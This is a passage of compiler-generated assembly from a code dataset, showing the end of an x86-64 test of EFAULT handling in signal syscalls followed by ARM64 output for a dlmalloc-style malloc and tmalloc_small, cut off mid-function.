je LBB0_9
LBB0_8:
movl -8(%rbp), %eax
movl %eax, -20(%rbp) ## 4-byte Spill
callq ___error
movl -20(%rbp), %esi ## 4-byte Reload
movl (%rax), %edx
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -4(%rbp)
jmp LBB0_10
LBB0_9:
movl $0, -4(%rbp)
LBB0_10:
movl -4(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "SYS_sigsuspend did not return EFAULT: ret=%d, errno=%d\n"
L_.str.1: ## @.str.1
.asciz "SYS_sigprocmask did not return EFAULT: ret=%d, errno=%d\n"
L_.str.2: ## @.str.2
.asciz "SYS_sigaction did not return EFAULT: ret=%d, errno=%d\n"
.subsections_via_symbols
| the_stack_data/86075463.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _malloc ; -- Begin function malloc
.p2align 2
_malloc: ; @malloc
.cfi_startproc
; %bb.0:
sub sp, sp, #288
.cfi_def_cfa_offset 288
stp x28, x27, [sp, #256] ; 16-byte Folded Spill
stp x29, x30, [sp, #272] ; 16-byte Folded Spill
add x29, sp, #272
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, __gm_@PAGE
add x8, x8, __gm_@PAGEOFF
str x8, [sp, #24] ; 8-byte Folded Spill
add x8, x8, #72
str x8, [sp, #32] ; 8-byte Folded Spill
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #232
cset w8, hi
tbnz w8, #0, LBB0_43
b LBB0_1
LBB0_1:
ldur x8, [x29, #-24]
subs x8, x8, #23
cset w8, hs
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
mov x8, #32
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB0_4
LBB0_3:
ldur x8, [x29, #-24]
add x8, x8, #8
add x8, x8, #15
and x8, x8, #0xfffffffffffffff0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB0_4
LBB0_4:
ldr x8, [sp, #16] ; 8-byte Folded Reload
stur x8, [x29, #-40]
ldur x8, [x29, #-40]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-44]
adrp x8, __gm_@PAGE
ldr w8, [x8, __gm_@PAGEOFF]
ldur w9, [x29, #-44]
lsr w8, w8, w9
stur w8, [x29, #-48]
ldur w8, [x29, #-48]
ands w8, w8, #0x3
cset w8, eq
tbnz w8, #0, LBB0_14
b LBB0_5
LBB0_5:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldur w9, [x29, #-48]
mvn w9, w9
and w10, w9, #0x1
ldur w9, [x29, #-44]
add w9, w9, w10
stur w9, [x29, #-44]
ldur w9, [x29, #-44]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
stur x8, [x29, #-56]
ldur x8, [x29, #-56]
ldr x8, [x8, #16]
stur x8, [x29, #-64]
ldur x8, [x29, #-64]
ldr x8, [x8, #16]
stur x8, [x29, #-72]
ldur x8, [x29, #-56]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
ldur w9, [x29, #-44]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
bic w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB0_13
LBB0_7:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-72]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
ldur x8, [x29, #-72]
ldr x8, [x8, #24]
ldur x9, [x29, #-64]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB0_9
LBB0_9:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
ldur x8, [x29, #-56]
ldur x9, [x29, #-72]
str x8, [x9, #24]
ldur x8, [x29, #-72]
ldur x9, [x29, #-56]
str x8, [x9, #16]
b LBB0_12
LBB0_11:
bl _abort
LBB0_12:
b LBB0_13
LBB0_13:
ldur w8, [x29, #-44]
lsl w8, w8, #3
; kill: def $x8 killed $w8
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-64]
str x8, [x9, #8]
ldur x8, [x29, #-64]
ldur w9, [x29, #-44]
lsl w9, w9, #3
; kill: def $x9 killed $w9
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
ldur x8, [x29, #-64]
add x8, x8, #16
stur x8, [x29, #-32]
b LBB0_59
LBB0_14:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
ldr x9, [x9, #8]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB0_41
b LBB0_15
LBB0_15:
ldur w8, [x29, #-48]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_36
b LBB0_16
LBB0_16:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldur w9, [x29, #-48]
ldur w10, [x29, #-44]
lsl w9, w9, w10
ldur w11, [x29, #-44]
mov w10, #1
lsl w12, w10, w11
ldur w11, [x29, #-44]
lsl w11, w10, w11
mov w10, #0
subs w11, w10, w11, lsl #1
orr w11, w11, w12, lsl #1
and w9, w9, w11
stur w9, [x29, #-112]
ldur w9, [x29, #-112]
ldur w11, [x29, #-112]
subs w10, w10, w11
and w9, w9, w10
stur w9, [x29, #-116]
ldur w9, [x29, #-116]
subs w9, w9, #1
stur w9, [x29, #-120]
ldur w9, [x29, #-120]
lsr w9, w9, #12
and w9, w9, #0x10
stur w9, [x29, #-124]
ldur w9, [x29, #-124]
stur w9, [x29, #-128]
ldur w10, [x29, #-124]
ldur w9, [x29, #-120]
lsr w9, w9, w10
stur w9, [x29, #-120]
ldur w9, [x29, #-120]
lsr w9, w9, #5
and w10, w9, #0x8
stur w10, [x29, #-124]
ldur w9, [x29, #-128]
add w9, w9, w10
stur w9, [x29, #-128]
ldur w10, [x29, #-124]
ldur w9, [x29, #-120]
lsr w9, w9, w10
stur w9, [x29, #-120]
ldur w9, [x29, #-120]
lsr w9, w9, #2
and w10, w9, #0x4
stur w10, [x29, #-124]
ldur w9, [x29, #-128]
add w9, w9, w10
stur w9, [x29, #-128]
ldur w10, [x29, #-124]
ldur w9, [x29, #-120]
lsr w9, w9, w10
stur w9, [x29, #-120]
ldur w9, [x29, #-120]
lsr w9, w9, #1
and w10, w9, #0x2
stur w10, [x29, #-124]
ldur w9, [x29, #-128]
add w9, w9, w10
stur w9, [x29, #-128]
ldur w10, [x29, #-124]
ldur w9, [x29, #-120]
lsr w9, w9, w10
stur w9, [x29, #-120]
ldur w9, [x29, #-120]
lsr w9, w9, #1
and w10, w9, #0x1
stur w10, [x29, #-124]
ldur w9, [x29, #-128]
add w9, w9, w10
stur w9, [x29, #-128]
ldur w10, [x29, #-124]
ldur w9, [x29, #-120]
lsr w9, w9, w10
stur w9, [x29, #-120]
ldur w9, [x29, #-128]
ldur w10, [x29, #-120]
add w9, w9, w10
stur w9, [x29, #-108]
ldur w9, [x29, #-108]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
stur x8, [x29, #-80]
ldur x8, [x29, #-80]
ldr x8, [x8, #16]
stur x8, [x29, #-88]
ldur x8, [x29, #-88]
ldr x8, [x8, #16]
str x8, [sp, #136]
ldur x8, [x29, #-80]
ldr x9, [sp, #136]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17:
ldur w9, [x29, #-108]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
bic w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB0_24
LBB0_18:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #136]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB0_20
b LBB0_19
LBB0_19:
ldr x8, [sp, #136]
ldr x8, [x8, #24]
ldur x9, [x29, #-88]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB0_20
LBB0_20:
ldr w8, [sp, #8] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_22
b LBB0_21
LBB0_21:
ldur x8, [x29, #-80]
ldr x9, [sp, #136]
str x8, [x9, #24]
ldr x8, [sp, #136]
ldur x9, [x29, #-80]
str x8, [x9, #16]
b LBB0_23
LBB0_22:
bl _abort
LBB0_23:
b LBB0_24
LBB0_24:
ldur w8, [x29, #-108]
lsl w8, w8, #3
; kill: def $x8 killed $w8
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-104]
ldur x8, [x29, #-104]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB0_26
b LBB0_25
LBB0_25:
ldur w8, [x29, #-108]
lsl w8, w8, #3
; kill: def $x8 killed $w8
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-88]
str x8, [x9, #8]
ldur x8, [x29, #-88]
ldur w9, [x29, #-108]
lsl w9, w9, #3
; kill: def $x9 killed $w9
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
b LBB0_35
LBB0_26:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur x9, [x29, #-40]
orr x9, x9, #0x1
orr x9, x9, #0x2
ldur x10, [x29, #-88]
str x9, [x10, #8]
ldur x9, [x29, #-88]
ldur x10, [x29, #-40]
add x9, x9, x10
stur x9, [x29, #-96]
ldur x9, [x29, #-104]
orr x9, x9, #0x1
ldur x10, [x29, #-96]
str x9, [x10, #8]
ldur x9, [x29, #-104]
ldur x10, [x29, #-96]
ldur x11, [x29, #-104]
str x9, [x10, x11]
ldr x8, [x8, #8]
str x8, [sp, #128]
ldr x8, [sp, #128]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_34
b LBB0_27
LBB0_27:
ldr x8, [sp, #32] ; 8-byte Folded Reload
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x9, [x9, #32]
str x9, [sp, #120]
ldr x9, [sp, #128]
lsr x9, x9, #3
; kill: def $w9 killed $w9 killed $x9
str w9, [sp, #116]
ldr w9, [sp, #116]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #104]
ldr x8, [sp, #104]
str x8, [sp, #96]
adrp x8, __gm_@PAGE
ldr w8, [x8, __gm_@PAGEOFF]
ldr w10, [sp, #116]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB0_29
b LBB0_28
LBB0_28:
ldr w9, [sp, #116]
mov w8, #1
lsl w10, w8, w9
adrp x9, __gm_@PAGE
ldr w8, [x9, __gm_@PAGEOFF]
orr w8, w8, w10
str w8, [x9, __gm_@PAGEOFF]
b LBB0_33
LBB0_29:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #104]
ldr x8, [x8, #16]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_31
b LBB0_30
LBB0_30:
ldr x8, [sp, #104]
ldr x8, [x8, #16]
str x8, [sp, #96]
b LBB0_32
LBB0_31:
bl _abort
LBB0_32:
b LBB0_33
LBB0_33:
ldr x8, [sp, #120]
ldr x9, [sp, #104]
str x8, [x9, #16]
ldr x8, [sp, #120]
ldr x9, [sp, #96]
str x8, [x9, #24]
ldr x8, [sp, #96]
ldr x9, [sp, #120]
str x8, [x9, #16]
ldr x8, [sp, #104]
ldr x9, [sp, #120]
str x8, [x9, #24]
b LBB0_34
LBB0_34:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-104]
str x8, [x9, #8]
ldur x8, [x29, #-96]
str x8, [x9, #32]
b LBB0_35
LBB0_35:
ldur x8, [x29, #-88]
add x8, x8, #16
stur x8, [x29, #-32]
b LBB0_59
LBB0_36:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr w8, [x8, #4]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_39
b LBB0_37
LBB0_37:
ldur x1, [x29, #-40]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _tmalloc_small
mov x8, x0
stur x8, [x29, #-32]
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_39
b LBB0_38
LBB0_38:
b LBB0_59
LBB0_39:
b LBB0_40
LBB0_40:
b LBB0_41
LBB0_41:
b LBB0_42
LBB0_42:
b LBB0_50
LBB0_43:
ldur x8, [x29, #-24]
adds x8, x8, #128
cset w8, lo
tbnz w8, #0, LBB0_45
b LBB0_44
LBB0_44:
mov x8, #-1
stur x8, [x29, #-40]
b LBB0_49
LBB0_45:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldur x9, [x29, #-24]
add x9, x9, #8
add x9, x9, #15
and x9, x9, #0xfffffffffffffff0
stur x9, [x29, #-40]
ldr w8, [x8, #4]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_48
b LBB0_46
LBB0_46:
ldur x1, [x29, #-40]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _tmalloc_large
mov x8, x0
stur x8, [x29, #-32]
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_48
b LBB0_47
LBB0_47:
b LBB0_59
LBB0_48:
b LBB0_49
LBB0_49:
b LBB0_50
LBB0_50:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
ldr x9, [x9, #8]
subs x8, x8, x9
cset w8, hi
tbnz w8, #0, LBB0_55
b LBB0_51
LBB0_51:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [x8, #8]
ldur x10, [x29, #-40]
subs x9, x9, x10
str x9, [sp, #88]
ldr x8, [x8, #32]
str x8, [sp, #80]
ldr x8, [sp, #88]
subs x8, x8, #32
cset w8, lo
tbnz w8, #0, LBB0_53
b LBB0_52
LBB0_52:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #80]
ldur x10, [x29, #-40]
add x8, x8, x10
str x8, [x9, #32]
str x8, [sp, #72]
ldr x8, [sp, #88]
str x8, [x9, #8]
ldr x8, [sp, #88]
orr x8, x8, #0x1
ldr x9, [sp, #72]
str x8, [x9, #8]
ldr x8, [sp, #88]
ldr x9, [sp, #72]
ldr x10, [sp, #88]
str x8, [x9, x10]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #80]
str x8, [x9, #8]
b LBB0_54
LBB0_53:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [x8, #8]
str x9, [sp, #64]
str xzr, [x8, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
ldr x8, [sp, #64]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #80]
str x8, [x9, #8]
ldr x8, [sp, #80]
ldr x9, [sp, #64]
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
b LBB0_54
LBB0_54:
ldr x8, [sp, #80]
add x8, x8, #16
stur x8, [x29, #-32]
b LBB0_59
LBB0_55:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
ldr x9, [x9, #16]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB0_57
b LBB0_56
LBB0_56:
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldur x10, [x29, #-40]
ldr x8, [x9, #16]
subs x8, x8, x10
str x8, [x9, #16]
str x8, [sp, #56]
ldr x8, [x9, #40]
str x8, [sp, #48]
ldr x8, [sp, #48]
ldur x10, [x29, #-40]
add x8, x8, x10
str x8, [x9, #40]
str x8, [sp, #40]
ldr x8, [sp, #56]
orr x8, x8, #0x1
ldr x9, [sp, #40]
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldr x9, [sp, #48]
str x8, [x9, #8]
ldr x8, [sp, #48]
add x8, x8, #16
stur x8, [x29, #-32]
b LBB0_59
LBB0_57:
b LBB0_58
LBB0_58:
ldur x1, [x29, #-40]
adrp x0, __gm_@PAGE
add x0, x0, __gm_@PAGEOFF
bl _sys_alloc
stur x0, [x29, #-32]
b LBB0_59
LBB0_59:
ldur x0, [x29, #-32]
ldp x29, x30, [sp, #272] ; 16-byte Folded Reload
ldp x28, x27, [sp, #256] ; 16-byte Folded Reload
add sp, sp, #288
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function tmalloc_small
_tmalloc_small: ; @tmalloc_small
.cfi_startproc
; %bb.0:
sub sp, sp, #224
.cfi_def_cfa_offset 224
stp x29, x30, [sp, #208] ; 16-byte Folded Spill
add x29, sp, #208
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x8, [x29, #-8]
ldr w8, [x8, #4]
ldur x9, [x29, #-8]
ldr w10, [x9, #4]
mov w9, #0
subs w9, w9, w10
and w8, w8, w9
stur w8, [x29, #-48]
ldur w8, [x29, #-48]
subs w8, w8, #1
stur w8, [x29, #-52]
ldur w8, [x29, #-52]
lsr w8, w8, #12
and w8, w8, #0x10
stur w8, [x29, #-56]
ldur w8, [x29, #-56]
stur w8, [x29, #-60]
ldur w9, [x29, #-56]
ldur w8, [x29, #-52]
lsr w8, w8, w9
stur w8, [x29, #-52]
ldur w8, [x29, #-52]
lsr w8, w8, #5
and w9, w8, #0x8
stur w9, [x29, #-56]
ldur w8, [x29, #-60]
add w8, w8, w9
stur w8, [x29, #-60]
ldur w9, [x29, #-56]
ldur w8, [x29, #-52]
lsr w8, w8, w9
stur w8, [x29, #-52]
ldur w8, [x29, #-52]
lsr w8, w8, #2
and w9, w8, #0x4
stur w9, [x29, #-56]
ldur w8, [x29, #-60]
add w8, w8, w9
stur w8, [x29, #-60]
ldur w9, [x29, #-56]
ldur w8, [x29, #-52]
lsr w8, w8, w9
stur w8, [x29, #-52]
ldur w8, [x29, #-52]
lsr w8, w8, #1
and w9, w8, #0x2
stur w9, [x29, #-56]
ldur w8, [x29, #-60]
add w8, w8, w9
stur w8, [x29, #-60]
ldur w9, [x29, #-56]
ldur w8, [x29, #-52]
lsr w8, w8, w9
stur w8, [x29, #-52]
ldur w8, [x29, #-52]
lsr w8, w8, #1
and w9, w8, #0x1
stur w9, [x29, #-56]
ldur w8, [x29, #-60]
add w8, w8, w9
stur w8, [x29, #-60]
ldur w9, [x29, #-56]
ldur w8, [x29, #-52]
lsr w8, w8, w9
stur w8, [x29, #-52]
ldur w8, [x29, #-60]
ldur w9, [x29, #-52]
add w8, w8, w9
stur w8, [x29, #-44]
ldur x8, [x29, #-8]
add x8, x8, #600
ldur w9, [x29, #-44]
; kill: def $x9 killed $w9
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-24]
stur x8, [x29, #-32]
ldur x8, [x29, #-24]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-16]
subs x8, x8, x9
stur x8, [x29, #-40]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_3
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #32]
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB1_4
LBB1_3: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #40]
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB1_4
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #16] ; 8-byte Folded Reload
mov x9, x8
stur x9, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_8
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-24]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-16]
subs x8, x8, x9
stur x8, [x29, #-72]
ldur x8, [x29, #-72]
ldur x9, [x29, #-40]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB1_7
b LBB1_6
LBB1_6: ; in Loop: Header=BB1_1 Depth=1
ldur x8, [x29, #-72]
stur x8, [x29, #-40]
ldur x8, [x29, #-24]
stur x8, [x29, #-32]
b LBB1_7
LBB1_7: ; in Loop: Header=BB1_1 Depth=1
b LBB1_1
LBB1_8:
ldur x8, [x29, #-32]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_71
b LBB1_9
LBB1_9:
ldur x8, [x29, #-32]
ldur x9, [x29, #-16]
add x8, x8, x9
stur x8, [x29, #-80]
ldur x8, [x29, #-32]
ldur x9, [x29, #-80]
subs x8, x8, x9
cset w9, lo
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_70
b LBB1_10
LBB1_10:
ldur x8, [x29, #-32]
ldr x8, [x8, #48]
stur x8, [x29, #-88]
ldur x8, [x29, #-32]
ldr x8, [x8, #24]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB1_18
b LBB1_11
LBB1_11:
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
str x8, [sp, #104]
ldur x8, [x29, #-32]
ldr x8, [x8, #24]
stur x8, [x29, #-96]
ldr x8, [sp, #104]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_14
b LBB1_12
LBB1_12:
ldr x8, [sp, #104]
ldr x8, [x8, #24]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_14
b LBB1_13
LBB1_13:
ldur x8, [x29, #-96]
ldr x8, [x8, #16]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_14
LBB1_14:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_16
b LBB1_15
LBB1_15:
ldur x8, [x29, #-96]
ldr x9, [sp, #104]
str x8, [x9, #24]
ldr x8, [sp, #104]
ldur x9, [x29, #-96]
str x8, [x9, #16]
b LBB1_17
LBB1_16:
bl _abort
LBB1_17:
b LBB1_30
LBB1_18:
ldur x8, [x29, #-32]
add x9, x8, #40
str x9, [sp, #96]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-96]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_20
b LBB1_19
LBB1_19:
ldur x8, [x29, #-32]
add x9, x8, #32
str x9, [sp, #96]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_29
b LBB1_20
LBB1_20:
b LBB1_21
LBB1_21: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-96]
add x9, x8, #40
str x9, [sp, #88]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_23
b LBB1_22
LBB1_22: ; in Loop: Header=BB1_21 Depth=1
ldur x8, [x29, #-96]
add x9, x8, #32
str x9, [sp, #88]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_23
LBB1_23: ; in Loop: Header=BB1_21 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB1_25
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_21 Depth=1
ldr x8, [sp, #88]
mov x9, x8
str x9, [sp, #96]
ldr x8, [x8]
stur x8, [x29, #-96]
b LBB1_21
LBB1_25:
ldr x8, [sp, #96]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_27
b LBB1_26
LBB1_26:
ldr x8, [sp, #96]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB1_28
LBB1_27:
bl _abort
LBB1_28:
b LBB1_29
LBB1_29:
b LBB1_30
LBB1_30:
ldur x8, [x29, #-88]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_58
b LBB1_31
LBB1_31:
ldur x8, [x29, #-8]
add x8, x8, #600
ldur x9, [x29, #-32]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #80]
ldur x8, [x29, #-32]
ldr x9, [sp, #80]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_35
b LBB1_32
LBB1_32:
ldur x8, [x29, #-96]
ldr x10, [sp, #80]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB1_34
b LBB1_33
LBB1_33:
ldur x8, [x29, #-32]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-8]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB1_34
LBB1_34:
b LBB1_42
LBB1_35:
ldur x8, [x29, #-88]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_40
b LBB1_36
LBB1_36:
ldur x8, [x29, #-88]
ldr x8, [x8, #32]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB1_38
b LBB1_37
LBB1_37:
ldur x8, [x29, #-96]
ldur x9, [x29, #-88]
str x8, [x9, #32]
b LBB1_39
LBB1_38:
ldur x8, [x29, #-96]
ldur x9, [x29, #-88]
str x8, [x9, #40]
b LBB1_39
LBB1_39:
b LBB1_41
LBB1_40:
bl _abort
LBB1_41:
b LBB1_42
LBB1_42:
ldur x8, [x29, #-96]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_57
b LBB1_43
LBB1_43:
ldur x8, [x29, #-96]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_55
b LBB1_44
LBB1_44:
ldur x8, [x29, #-88]
ldur x9, [x29, #-96]
str x8, [x9, #48]
ldur x8, [x29, #-32]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #72]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_49
b LBB1_45
LBB1_45:
ldr x8, [sp, #72]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_47
b LBB1_46
LBB1_46:
ldr x8, [sp, #72]
ldur x9, [x29, #-96]
str x8, [x9, #32]
ldur x8, [x29, #-96]
ldr x9, [sp, #72]
str x8, [x9, #48]
b LBB1_48
LBB1_47:
bl _abort
LBB1_48:
b LBB1_49
LBB1_49:
ldur x8, [x29, #-32]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_54
b LBB1_50
LBB1_50:
ldr x8, [sp, #64]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_52
b LBB1_51
LBB1_51:
ldr x8, [sp, #64]
ldur x9, [x29, #-96]
str x8, [x9, #40]
ldur x8, [x29, #-96]
ldr x9, [sp, #64]
str x8, [x9, #48]
b LBB1_53
LBB1_52:
bl _abort
LBB1_53:
b LBB1_54
LBB1_54:
b LBB1_56
LBB1_55:
bl _abort
LBB1_56:
b LBB1_57
LBB1_57:
b LBB1_58
LBB1_58:
ldur x8, [x29, #-40]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB1_60
b LBB1_59
LBB1_59:
ldur x8, [x29, #-40]
ldur x9, [x29, #-16]
add x8, x8, x9
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
ldur x10, [x29, #-16]
add x9, x9, x10
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
